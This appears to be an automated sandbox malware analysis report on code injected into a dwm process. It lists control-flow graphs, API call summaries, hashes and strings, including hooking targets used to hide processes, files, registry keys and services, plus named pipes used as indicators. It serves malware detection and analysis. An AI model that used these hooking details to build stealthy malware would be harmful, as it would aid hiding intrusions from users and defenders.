1c6cef153f5-1c6cef15408 157->161 160->161 161->132 170 1c6cef15431-1c6cef1543a 163->170 171 1c6cef15424-1c6cef1542c 163->171 164->154 168->157 172 1c6cef1544c-1c6cef1549a call 1c6cef18d50 170->172 173 1c6cef1543c-1c6cef15449 170->173 171->154 176 1c6cef154a2-1c6cef154aa 172->176 173->172 177 1c6cef155b7-1c6cef155bf 176->177 178 1c6cef154b0-1c6cef1559b call 1c6cef17520 176->178 179 1c6cef155c1-1c6cef155d4 call 1c6cef14670 177->179 180 1c6cef15603-1c6cef1560b 177->180 190 1c6cef1559d 178->190 191 1c6cef1559f-1c6cef155ae call 1c6cef14140 178->191 192 1c6cef155d6 179->192 193 1c6cef155d8-1c6cef15601 179->193 183 1c6cef15617-1c6cef15626 180->183 184 1c6cef1560d-1c6cef15615 180->184 188 1c6cef15628 183->188 189 1c6cef1562f 183->189 184->183 187 1c6cef15634-1c6cef15641 184->187 194 1c6cef15643 187->194 195 1c6cef15644-1c6cef15699 call 1c6cef186a0 187->195 188->189 189->187 190->177 200 1c6cef155b0 191->200 201 1c6cef155b2 191->201 192->180 193->177 194->195 202 1c6cef156a8-1c6cef15741 call 1c6cef145f0 call 1c6cef14550 VirtualProtect 195->202 203 1c6cef1569b-1c6cef156a3 195->203 200->177 201->176 208 1c6cef15751-1c6cef157b1 202->208 209 1c6cef15743-1c6cef15748 GetLastError 202->209 208->132 209->208
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                • Instruction ID: 1401f7594aedbc2a40fc320add54b261cbf437334fd16b5007d919a237512fc1
                                                • Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                • Instruction Fuzzy Hash: CE02F972259B8486EBA1CB95E89479AB7B1F3C4784F101015EADE87BA8DF7DC484CF04

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 02e7c52fa1eefa398fd4b30c104494b3dc2ebb6dd0ddfc9c49650c7f2dc12be1
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 02115E7A746B8582FB189B51F808BA966B1F788B94F450029DEE907794EF7DC504C708

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocQuery
                                                • String ID:
                                                • API String ID: 31662377-0
                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction ID: f6705c223946c7667315452564325fe4ca9baa9446a0b5e1971e3db26f5c99d8
                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction Fuzzy Hash: 8831217225AA8881FB34DB95E854B9AB3B0F388784F110525F5DD46BA8EFBDC540CB08

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: f2f801e5341de374d818ecdcd1021b69ccc215b2ed4f10c19c2c823c9aff2920
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: BA11D2F16D625982FB25D7E4FC0AFE922B4B7A4304F5580299AF6851D4EFBCC044C21C

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                • String ID:
                                                • API String ID: 3733156554-0
                                                • Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                • Instruction ID: bc9f3c36bdff4e1bc3e18ff399c7788fed31c954ffbd22f3ec76684d8bbc9d87
                                                • Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                • Instruction Fuzzy Hash: 22F0BD76258B8881E730DB45E851B8A67B0E3C87D4F140115B9DE07BA9CF39C190CB04

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 263 1c6ceee2908-1c6ceee2973 call 1c6ceee0f34 * 4 272 1c6ceee2b8b 263->272 273 1c6ceee2979-1c6ceee297c 263->273 274 1c6ceee2b8d-1c6ceee2ba9 272->274 273->272 275 1c6ceee2982-1c6ceee2985 273->275 275->272 276 1c6ceee298b-1c6ceee298e 275->276 276->272 277 1c6ceee2994-1c6ceee29b2 VirtualAlloc 276->277 277->272 278 1c6ceee29b8-1c6ceee29dc call 1c6ceee0d6c 277->278 281 1c6ceee29de-1c6ceee2a09 call 1c6ceee0d6c 278->281 282 1c6ceee2a0b-1c6ceee2a12 278->282 281->282 284 1c6ceee2ab2-1c6ceee2ab9 282->284 285 1c6ceee2a18-1c6ceee2a25 282->285 286 1c6ceee2abf-1c6ceee2ad6 284->286 287 1c6ceee2b6c-1c6ceee2b89 284->287 285->284 289 1c6ceee2a2b-1c6ceee2a39 LoadLibraryA 285->289 286->287 290 1c6ceee2adc 286->290 287->274 291 1c6ceee2a9d-1c6ceee2aa5 289->291 292 1c6ceee2a3b-1c6ceee2a45 289->292 295 1c6ceee2ae2-1c6ceee2af7 290->295 291->289 293 1c6ceee2aa7-1c6ceee2aac 291->293 296 1c6ceee2a48-1c6ceee2a4c 292->296 293->284 297 1c6ceee2b5b-1c6ceee2b66 295->297 298 1c6ceee2af9-1c6ceee2b0a 295->298 299 1c6ceee2a4e-1c6ceee2a52 296->299 300 1c6ceee2a9a 296->300 297->287 297->295 302 1c6ceee2b15-1c6ceee2b19 298->302 303 1c6ceee2b0c-1c6ceee2b13 298->303 304 1c6ceee2a54-1c6ceee2a7b 299->304 305 1c6ceee2a7d-1c6ceee2a87 299->305 300->291 307 1c6ceee2b24-1c6ceee2b28 302->307 308 1c6ceee2b1b-1c6ceee2b22 302->308 306 1c6ceee2b48-1c6ceee2b59 303->306 309 1c6ceee2a8d-1c6ceee2a98 304->309 305->309 306->297 306->298 310 1c6ceee2b3a-1c6ceee2b3e 307->310 311 1c6ceee2b2a-1c6ceee2b38 307->311 308->306 309->296 310->306 312 1c6ceee2b40-1c6ceee2b43 310->312 311->306 312->306
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd
                                                Similarity
                                                • API ID: AllocLibraryLoadVirtual
                                                • String ID:
                                                • API String ID: 3550616410-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: b0eb08e3bfbb60eeeb536c4b1ea7b986651c0ff517f7c980f80b92fe55bfddbf
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: B961FE32741A5187FB68CF25D840BA9B3A6FB4CBD4F548025DA9E07785EB38E853C748

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000001C6CEF11650: GetProcessHeap.KERNEL32 ref: 000001C6CEF1165B
                                                  • Part of subcall function 000001C6CEF11650: HeapAlloc.KERNEL32 ref: 000001C6CEF1166A
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF116DA
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11707
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11721
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11741
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF1175C
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF1177C
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11797
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF117B7
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF117D2
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF117F2
                                                • Sleep.KERNEL32 ref: 000001C6CEF11C43
                                                • SleepEx.KERNELBASE ref: 000001C6CEF11C49
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF1180D
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF1182D
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11848
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF11868
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF11883
                                                  • Part of subcall function 000001C6CEF11650: RegOpenKeyExW.ADVAPI32 ref: 000001C6CEF118A3
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF118BE
                                                  • Part of subcall function 000001C6CEF11650: RegCloseKey.ADVAPI32 ref: 000001C6CEF118C8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: fd78d7c6a5adf4b60a55e09ff287725481ac5a39e1101aff71a959d5f1980cdc
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 3E31EDB7280A4991FB509FB6DE41BEE23B4AB44BD0F145021DEED876D6EF25C860C258

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 352 1c6cef42908-1c6cef42973 call 1c6cef40f34 * 4 361 1c6cef42b8b 352->361 362 1c6cef42979-1c6cef4297c 352->362 363 1c6cef42b8d-1c6cef42ba9 361->363 362->361 364 1c6cef42982-1c6cef42985 362->364 364->361 365 1c6cef4298b-1c6cef4298e 364->365 365->361 366 1c6cef42994-1c6cef429b2 VirtualAlloc 365->366 366->361 367 1c6cef429b8-1c6cef429dc call 1c6cef40d6c 366->367 370 1c6cef42a0b-1c6cef42a12 367->370 371 1c6cef429de-1c6cef42a09 call 1c6cef40d6c 367->371 373 1c6cef42a18-1c6cef42a25 370->373 374 1c6cef42ab2-1c6cef42ab9 370->374 371->370 373->374 378 1c6cef42a2b-1c6cef42a39 373->378 376 1c6cef42b6c-1c6cef42b89 374->376 377 1c6cef42abf-1c6cef42ad6 374->377 376->363 377->376 379 1c6cef42adc 377->379 385 1c6cef42a3b-1c6cef42a45 378->385 386 1c6cef42a9d-1c6cef42aa5 378->386 381 1c6cef42ae2-1c6cef42af7 379->381 383 1c6cef42b5b-1c6cef42b66 381->383 384 1c6cef42af9-1c6cef42b0a 381->384 383->376 383->381 389 1c6cef42b0c-1c6cef42b13 384->389 390 1c6cef42b15-1c6cef42b19 384->390 391 1c6cef42a48-1c6cef42a4c 385->391 386->378 387 1c6cef42aa7-1c6cef42aac 386->387 387->374 392 1c6cef42b48-1c6cef42b59 389->392 393 1c6cef42b1b-1c6cef42b22 390->393 394 1c6cef42b24-1c6cef42b28 390->394 395 1c6cef42a9a 391->395 396 1c6cef42a4e-1c6cef42a52 391->396 392->383 392->384 393->392 397 1c6cef42b3a-1c6cef42b3e 394->397 398 1c6cef42b2a-1c6cef42b38 394->398 395->386 399 1c6cef42a7d-1c6cef42a87 396->399 400 1c6cef42a54-1c6cef42a7b 396->400 397->392 402 1c6cef42b40-1c6cef42b43 397->402 398->392 401 1c6cef42a8d-1c6cef42a98 399->401 400->401 401->391 402->392
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: cc52f35e6bf302ebf835e16cb1959fd63dcfc8ec92895573d399674221a92ee8
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 5B61213274125187FB68CF25DA40BADB3B5FB44BA4F148032DEA907785DB38E892C708

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 466 1c6cef12cdc-1c6cef12d55 call 1c6cef2ecc0 469 1c6cef12d5b-1c6cef12d61 466->469 470 1c6cef13090-1c6cef130b3 466->470 469->470 471 1c6cef12d67-1c6cef12d6a 469->471 471->470 472 1c6cef12d70-1c6cef12d73 471->472 472->470 473 1c6cef12d79-1c6cef12d89 GetModuleHandleA 472->473 474 1c6cef12d8b-1c6cef12d9b GetProcAddress 473->474 475 1c6cef12d9d 473->475 476 1c6cef12da0-1c6cef12dbe 474->476 475->476 476->470 478 1c6cef12dc4-1c6cef12de3 StrCmpNIW 476->478 478->470 479 1c6cef12de9-1c6cef12ded 478->479 479->470 480 1c6cef12df3-1c6cef12dfd 479->480 480->470 481 1c6cef12e03-1c6cef12e0a 480->481 481->470 482 1c6cef12e10-1c6cef12e23 481->482 483 1c6cef12e33 482->483 484 1c6cef12e25-1c6cef12e31 482->484 485 1c6cef12e36-1c6cef12e3a 483->485 484->485 486 1c6cef12e4a 485->486 487 1c6cef12e3c-1c6cef12e48 485->487 488 1c6cef12e4d-1c6cef12e57 486->488 487->488 489 1c6cef12f4d-1c6cef12f51 488->489 490 1c6cef12e5d-1c6cef12e60 488->490 491 1c6cef12f57-1c6cef12f5a 489->491 492 1c6cef13082-1c6cef1308a 489->492 493 1c6cef12e72-1c6cef12e7c 490->493 494 1c6cef12e62-1c6cef12e6f call 1c6cef11a14 490->494 495 1c6cef12f6b-1c6cef12f75 491->495 496 1c6cef12f5c-1c6cef12f68 call 1c6cef11a14 491->496 492->470 492->482 498 1c6cef12e7e-1c6cef12e8b 493->498 499 1c6cef12eb0-1c6cef12eba 493->499 494->493 504 1c6cef12f77-1c6cef12f84 495->504 505 1c6cef12fa5-1c6cef12fa8 495->505 496->495 498->499 500 1c6cef12e8d-1c6cef12e9a 498->500 501 1c6cef12eea-1c6cef12eed 499->501 502 1c6cef12ebc-1c6cef12ec9 499->502 509 1c6cef12e9d-1c6cef12ea3 500->509 511 1c6cef12efb-1c6cef12f08 lstrlenW 501->511 512 1c6cef12eef-1c6cef12ef9 call 1c6cef11d28 501->512 502->501 510 1c6cef12ecb-1c6cef12ed8 502->510 504->505 514 1c6cef12f86-1c6cef12f93 504->514 507 1c6cef12faa-1c6cef12fb3 call 1c6cef11d28 505->507 508 1c6cef12fb5-1c6cef12fc2 lstrlenW 505->508 507->508 533 1c6cef12ffa-1c6cef13005 507->533 518 1c6cef12fe5-1c6cef12fef call 1c6cef13930 508->518 519 1c6cef12fc4-1c6cef12fce 508->519 516 1c6cef12ea9-1c6cef12eae 509->516 517 1c6cef12f43-1c6cef12f48 509->517 520 1c6cef12edb-1c6cef12ee1 510->520 522 1c6cef12f2b-1c6cef12f3d call 1c6cef13930 511->522 523 1c6cef12f0a-1c6cef12f14 511->523 512->511 512->517 524 1c6cef12f96-1c6cef12f9c 514->524 516->499 516->509 527 1c6cef12ff2-1c6cef12ff4 517->527 518->527 519->518 528 1c6cef12fd0-1c6cef12fe3 call 1c6cef11554 519->528 520->517 529 1c6cef12ee3-1c6cef12ee8 520->529 522->517 522->527 523->522 532 1c6cef12f16-1c6cef12f29 call 1c6cef11554 523->532 524->533 534 1c6cef12f9e-1c6cef12fa3 524->534 527->492 527->533 528->518 528->533 529->501 529->520 532->517 532->522 538 1c6cef13007-1c6cef1300b 533->538 539 1c6cef1307c-1c6cef13080 533->539 534->505 534->524 543 1c6cef1300d-1c6cef13011 538->543 544 1c6cef13013-1c6cef1302d call 1c6cef186a0 538->544 539->492 543->544 546 1c6cef13030-1c6cef13033 543->546 544->546 548 1c6cef13056-1c6cef13059 546->548 549 1c6cef13035-1c6cef13053 call 1c6cef186a0 546->549 548->539 551 1c6cef1305b-1c6cef13079 call 1c6cef186a0 548->551 549->548 551->539
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: a373cb445be8c8da9b20be2bd855ca446f5f225dcf763266fe885d2703d759b8
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: F9B1DFB2251A9882FB698FA5DC54BE973B4F784B88F14501AEEA943794EF74CC40D344
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: fe592494eab8b3db047633efff28ee84d3d7d6afdf4cc59d54558a04c8d8edd5
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: AA315DB2245B8586FB648F60E840BEE73B0F795744F44442ADA9D47B98EF78C648C714
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: e0819e9e18dbf45100613067fb1abab242902e2ee4b9e02f9a5878c19a1ccfd2
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 4C316972244B8486EB208F64E844BDA73B4F798794F500126EAAD43BA8DF38C545CB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: f1027aabbbb33948f8b25775314fbd2107396455a5f0962c38ea0a62f326a2f9
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 04E1EF73B44AC09AF700CFA4D888ADD7BB1F355788F548116EEAA57B99DB38C816C704

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: 23013508cf5771263fdd12a3f0955e1cfe1116331695a3f4802a505f8f0bd159
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 56518DB2645B85D3FB14CFA2E948B9AB3B1F799F80F048124DAA907B14DF78C056CB04

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 84fa439c43bd5f8927ae65dd029de25ae90ea88c709bcec19299b8954eb4d115
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: F33192B42C198EA0FB09EFE5EC5AED43331FB64344F915413A5B916166AF38C249D398

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 61b157c2be016797b51069af18cd7c6b0ef80f2c6d19b4743f106360da3e87b7
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: A7218376654B85C3F710CB64F808B9973B0F788BA4F504215DAA906BA8CF7CC149CF04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 09c1b36897fdb5057a155b341a75f2ed4a05c06e4a0b5fa0321ce3e2c9e72505
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: AC415C73654B8496E7648F62E844BDAB7B5F388B84F008129DBD907A54DF38D564CB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: eec606192f897ef0c8d4aeaaebe731d112bd7a3f1457a02859a8867d61895c2f
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: F181FF3178064186FB64AB65AE40FDD22F0EB95780F56802BEAF5437D2EB38C985C708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 153d35874351d35213f3ecd805990f07b28174c853a0856c0c23b3b89244d9cb
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 9F81B031B90E4287FB54AB66AC42FE962F0E74D7C0F5440259AC947796EB38CC47C788
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 989f6fb629c89564725181cbbcd0c45adafe132ae91089c32857ccd97c1bdfbb
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 9D81F2B0B8438986FB54ABE99C41FD922F0AB97B80F6480159AFD477D6DF38C941C718
                                                APIs
                                                Strings
